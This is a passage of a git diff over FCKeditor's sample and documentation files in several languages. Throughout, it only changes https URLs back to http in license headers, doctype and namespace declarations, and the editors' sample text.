https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * This page lists the data posted by a form. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Samples - Posted Data</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/_samples/html/sampleposteddata.html b/admin/FCKeditor/_samples/html/sampleposteddata.html index c20a5e2..0d796f1 100755 --- a/admin/FCKeditor/_samples/html/sampleposteddata.html +++ b/admin/FCKeditor/_samples/html/sampleposteddata.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,20 +9,20 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * This page lists the data posted by a form. It uses the URL (GET data), * so it's limited to 2KB of data. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Samples - Posted Data</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/_samples/lasso/sample01.lasso b/admin/FCKeditor/_samples/lasso/sample01.lasso index 0b7fc88..729fa00 100755 --- a/admin/FCKeditor/_samples/lasso/sample01.lasso +++ b/admin/FCKeditor/_samples/lasso/sample01.lasso @@ -1,6 +1,6 @@ [//lasso /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -43,7 +43,7 @@ var('myeditor') = fck_editor( -instancename='FCKeditor1', -basepath=$basepath, - -initialvalue='This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' + -initialvalue='This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ); $myeditor->create; diff --git a/admin/FCKeditor/_samples/lasso/sample02.lasso b/admin/FCKeditor/_samples/lasso/sample02.lasso index 23faa45..c33a75a 100755 --- a/admin/FCKeditor/_samples/lasso/sample02.lasso +++ b/admin/FCKeditor/_samples/lasso/sample02.lasso @@ -1,6 +1,6 @@ [//lasso /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -97,7 +97,7 @@ function ChangeLanguage( languageCode ) -instancename='FCKeditor1', -basepath=$basepath, -config=$config, - -initialvalue='This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' + -initialvalue='This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ); $myeditor->create; diff --git a/admin/FCKeditor/_samples/lasso/sample03.lasso b/admin/FCKeditor/_samples/lasso/sample03.lasso index 0fec0a8..11fadc9 100755 --- a/admin/FCKeditor/_samples/lasso/sample03.lasso +++ b/admin/FCKeditor/_samples/lasso/sample03.lasso @@ -1,6 +1,6 @@ [//lasso /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -71,7 +71,7 @@ function ChangeToolbar( toolbarName ) var('myeditor') = fck_editor( -instancename='FCKeditor1', -basepath=$basepath, - -initialvalue='This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' + -initialvalue='This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ); if(action_param('Toolbar')); diff --git a/admin/FCKeditor/_samples/lasso/sample04.lasso b/admin/FCKeditor/_samples/lasso/sample04.lasso index a64cf63..d218efb 100755 --- a/admin/FCKeditor/_samples/lasso/sample04.lasso +++ b/admin/FCKeditor/_samples/lasso/sample04.lasso @@ -1,6 +1,6 @@ [//lasso /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -77,7 +77,7 @@ function ChangeSkin( skinName ) var('myeditor') = fck_editor( -instancename='FCKeditor1', -basepath=$basepath, - -initialvalue='This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' + -initialvalue='This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ); if(action_param('Skin')); diff --git a/admin/FCKeditor/_samples/lasso/sampleposteddata.lasso b/admin/FCKeditor/_samples/lasso/sampleposteddata.lasso index 47c5986..650285b 100755 --- a/admin/FCKeditor/_samples/lasso/sampleposteddata.lasso +++ b/admin/FCKeditor/_samples/lasso/sampleposteddata.lasso @@ -1,6 +1,6 @@ [//lasso /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/perl/sample01.cgi b/admin/FCKeditor/_samples/perl/sample01.cgi index faccb95..fca7c16 100755 --- a/admin/FCKeditor/_samples/perl/sample01.cgi +++ b/admin/FCKeditor/_samples/perl/sample01.cgi @@ -1,7 +1,7 @@ #!/usr/bin/env perl ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -10,13 +10,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # @@ -84,7 +84,7 @@ _HTML_TAG_ $sBasePath = substr($sBasePath,0,index($sBasePath,"_samples")); &FCKeditor('FCKeditor1'); $BasePath = $sBasePath; - $Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.'; + $Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.'; &Create(); print <<"_HTML_TAG_"; diff --git a/admin/FCKeditor/_samples/perl/sample02.cgi b/admin/FCKeditor/_samples/perl/sample02.cgi index a957206..6c6aa4f 100755 --- a/admin/FCKeditor/_samples/perl/sample02.cgi +++ b/admin/FCKeditor/_samples/perl/sample02.cgi @@ -1,7 +1,7 @@ #!/usr/bin/env perl ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -10,13 +10,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # @@ -149,7 +149,7 @@ _HTML_TAG_ $Config{'AutoDetectLanguage'} = "true"; $Config{'DefaultLanguage'} = 'en' ; } - $Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; + $Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; &Create(); print <<"_HTML_TAG_"; diff --git a/admin/FCKeditor/_samples/perl/sample03.cgi b/admin/FCKeditor/_samples/perl/sample03.cgi index fcaf33c..7a14740 100755 --- a/admin/FCKeditor/_samples/perl/sample03.cgi +++ b/admin/FCKeditor/_samples/perl/sample03.cgi @@ -1,7 +1,7 @@ #!/usr/bin/env perl ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -10,13 +10,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # @@ -134,7 +134,7 @@ _HTML_TAG_ if($FORM{'Toolbar'} ne "") { $ToolbarSet = &specialchar_cnv( $FORM{'Toolbar'} ); } - $Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; + $Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; &Create(); print <<"_HTML_TAG_"; diff --git a/admin/FCKeditor/_samples/perl/sample04.cgi b/admin/FCKeditor/_samples/perl/sample04.cgi index 8f1e518..cf4956e 100755 --- a/admin/FCKeditor/_samples/perl/sample04.cgi +++ b/admin/FCKeditor/_samples/perl/sample04.cgi @@ -1,7 +1,7 @@ #!/usr/bin/env perl ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -10,13 +10,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # @@ -141,7 +141,7 @@ _HTML_TAG_ if($FORM{'Skin'} ne "") { $Config{'SkinPath'} = $sBasePath . 'editor/skins/' . &specialchar_cnv( $FORM{'Skin'} ) . '/' ; } - $Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; + $Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; &Create() ; print <<"_HTML_TAG_"; diff --git a/admin/FCKeditor/_samples/perl/sampleposteddata.cgi b/admin/FCKeditor/_samples/perl/sampleposteddata.cgi index 2bbb301..bc835a4 100755 --- a/admin/FCKeditor/_samples/perl/sampleposteddata.cgi +++ b/admin/FCKeditor/_samples/perl/sampleposteddata.cgi @@ -1,7 +1,7 @@ #!/usr/bin/env perl ##### -# FCKeditor - The text editor for Internet - https://www.fckeditor.net +# FCKeditor - The text editor for Internet - http://www.fckeditor.net # Copyright (C) 2003-2007 Frederico Caldeira Knabben # # == BEGIN LICENSE == @@ -10,13 +10,13 @@ # choice: # # - GNU General Public License Version 2 or later (the "GPL") -# https://www.gnu.org/licenses/gpl.html +# http://www.gnu.org/licenses/gpl.html # # - GNU Lesser General Public License Version 2.1 or later (the "LGPL") -# https://www.gnu.org/licenses/lgpl.html +# http://www.gnu.org/licenses/lgpl.html # # - Mozilla Public License Version 1.1 or later (the "MPL") -# https://www.mozilla.org/MPL/MPL-1.1.html +# http://www.mozilla.org/MPL/MPL-1.1.html # # == END LICENSE == # diff --git a/admin/FCKeditor/_samples/php/sample01.php b/admin/FCKeditor/_samples/php/sample01.php index add3b4c..7517f5f 100755 --- a/admin/FCKeditor/_samples/php/sample01.php +++ b/admin/FCKeditor/_samples/php/sample01.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -47,7 +47,7 @@ $sBasePath = substr( $sBasePath, 0, strpos( $sBasePath, "_samples" ) ) ; $oFCKeditor = new FCKeditor('FCKeditor1') ; $oFCKeditor->BasePath = $sBasePath ; -$oFCKeditor->Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +$oFCKeditor->Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; $oFCKeditor->Create() ; ?> <br> diff --git a/admin/FCKeditor/_samples/php/sample02.php b/admin/FCKeditor/_samples/php/sample02.php index 6b3691f..5ffc122 100755 --- a/admin/FCKeditor/_samples/php/sample02.php +++ b/admin/FCKeditor/_samples/php/sample02.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -99,7 +99,7 @@ else $oFCKeditor->Config['DefaultLanguage'] = 'en' ; } -$oFCKeditor->Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +$oFCKeditor->Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; $oFCKeditor->Create() ; ?> <br> <input type="submit" value="Submit"> diff --git a/admin/FCKeditor/_samples/php/sample03.php b/admin/FCKeditor/_samples/php/sample03.php index 7d7c6ce..2ae85c8 100755 --- a/admin/FCKeditor/_samples/php/sample03.php +++ b/admin/FCKeditor/_samples/php/sample03.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -79,7 +79,7 @@ $oFCKeditor->BasePath = $sBasePath ; if ( isset($_GET['Toolbar']) ) $oFCKeditor->ToolbarSet = htmlspecialchars($_GET['Toolbar']); -$oFCKeditor->Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +$oFCKeditor->Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; $oFCKeditor->Create() ; ?> <br> diff --git a/admin/FCKeditor/_samples/php/sample04.php b/admin/FCKeditor/_samples/php/sample04.php index 4c6dc46..3d2a136 100755 --- a/admin/FCKeditor/_samples/php/sample04.php +++ b/admin/FCKeditor/_samples/php/sample04.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * @@ -85,7 +85,7 @@ $oFCKeditor->BasePath = $sBasePath ; if ( isset($_GET['Skin']) ) $oFCKeditor->Config['SkinPath'] = $sBasePath . 'editor/skins/' . htmlspecialchars($_GET['Skin']) . '/' ; -$oFCKeditor->Value = 'This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.' ; +$oFCKeditor->Value = 'This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.' ; $oFCKeditor->Create() ; ?> <br> diff --git a/admin/FCKeditor/_samples/php/sampleposteddata.php b/admin/FCKeditor/_samples/php/sampleposteddata.php index 051fb44..93cc514 100755 --- a/admin/FCKeditor/_samples/php/sampleposteddata.php +++ b/admin/FCKeditor/_samples/php/sampleposteddata.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/py/sample01.py b/admin/FCKeditor/_samples/py/sample01.py index e7b8085..e7ac126 100755 --- a/admin/FCKeditor/_samples/py/sample01.py +++ b/admin/FCKeditor/_samples/py/sample01.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -FCKeditor - The text editor for Internet - https://www.fckeditor.net +FCKeditor - The text editor for Internet - http://www.fckeditor.net Copyright (C) 2003-2007 Frederico Caldeira Knabben == BEGIN LICENSE == @@ -10,13 +10,13 @@ Licensed under the terms of any of the following licenses at your choice: - GNU General Public License Version 2 or later (the "GPL") - https://www.gnu.org/licenses/gpl.html + http://www.gnu.org/licenses/gpl.html - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - https://www.gnu.org/licenses/lgpl.html + http://www.gnu.org/licenses/lgpl.html - Mozilla Public License Version 1.1 or later (the "MPL") - https://www.mozilla.org/MPL/MPL-1.1.html + http://www.mozilla.org/MPL/MPL-1.1.html == END LICENSE == @@ -57,7 +57,7 @@ try: oFCKeditor = fckeditor.FCKeditor('FCKeditor1') oFCKeditor.BasePath = sBasePath - oFCKeditor.Value = """This is some <strong>sample text</strong>. You are using <a href="https://www.fckeditor.net/">FCKeditor</a>.""" + oFCKeditor.Value = """This is some <strong>sample text</strong>. You are using <a href="http://www.fckeditor.net/">FCKeditor</a>.""" print oFCKeditor.Create() except Exception, e: print e diff --git a/admin/FCKeditor/_samples/py/sampleposteddata.py b/admin/FCKeditor/_samples/py/sampleposteddata.py index 4f91dc8..1b2e1ce 100755 --- a/admin/FCKeditor/_samples/py/sampleposteddata.py +++ b/admin/FCKeditor/_samples/py/sampleposteddata.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -FCKeditor - The text editor for Internet - https://www.fckeditor.net +FCKeditor - The text editor for Internet - http://www.fckeditor.net Copyright (C) 2003-2007 Frederico Caldeira Knabben == BEGIN LICENSE == @@ -10,13 +10,13 @@ Licensed under the terms of any of the following licenses at your choice: - GNU General Public License Version 2 or later (the "GPL") - https://www.gnu.org/licenses/gpl.html + http://www.gnu.org/licenses/gpl.html - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - https://www.gnu.org/licenses/lgpl.html + http://www.gnu.org/licenses/lgpl.html - Mozilla Public License Version 1.1 or later (the "MPL") - https://www.mozilla.org/MPL/MPL-1.1.html + http://www.mozilla.org/MPL/MPL-1.1.html == END LICENSE == diff --git a/admin/FCKeditor/_samples/sample.css b/admin/FCKeditor/_samples/sample.css index a4f231d..5e40a57 100755 --- a/admin/FCKeditor/_samples/sample.css +++ b/admin/FCKeditor/_samples/sample.css @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/_samples/sampleslist.html b/admin/FCKeditor/_samples/sampleslist.html index bf39a0e..51456b6 100755 --- a/admin/FCKeditor/_samples/sampleslist.html +++ b/admin/FCKeditor/_samples/sampleslist.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,19 +9,19 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * * Page used to select the sample to view. --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Sample Selection</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> diff --git a/admin/FCKeditor/_upgrade.html b/admin/FCKeditor/_upgrade.html index 8877cc8..8b95128 100755 --- a/admin/FCKeditor/_upgrade.html +++ b/admin/FCKeditor/_upgrade.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,17 +9,17 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == --> -<html xmlns="https://www.w3.org/1999/xhtml"> +<html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FCKeditor - Upgrade</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> @@ -32,7 +32,7 @@ <h1> FCKeditor Upgrade</h1> <p> - Please check the following URL for notes regarding upgrade: <a href="https://wiki.fckeditor.net/Developer%27s_Guide/Upgrade"> - https://wiki.fckeditor.net/Developer%27s_Guide/Upgrade</a></p> + Please check the following URL for notes regarding upgrade: <a href="http://wiki.fckeditor.net/Developer%27s_Guide/Upgrade"> + http://wiki.fckeditor.net/Developer%27s_Guide/Upgrade</a></p> </body> </html> diff --git a/admin/FCKeditor/_whatsnew.html b/admin/FCKeditor/_whatsnew.html index 53ce8c8..afc0184 100755 --- a/admin/FCKeditor/_whatsnew.html +++ b/admin/FCKeditor/_whatsnew.html @@ -1,6 +1,6 @@ -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,17 +9,17 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * 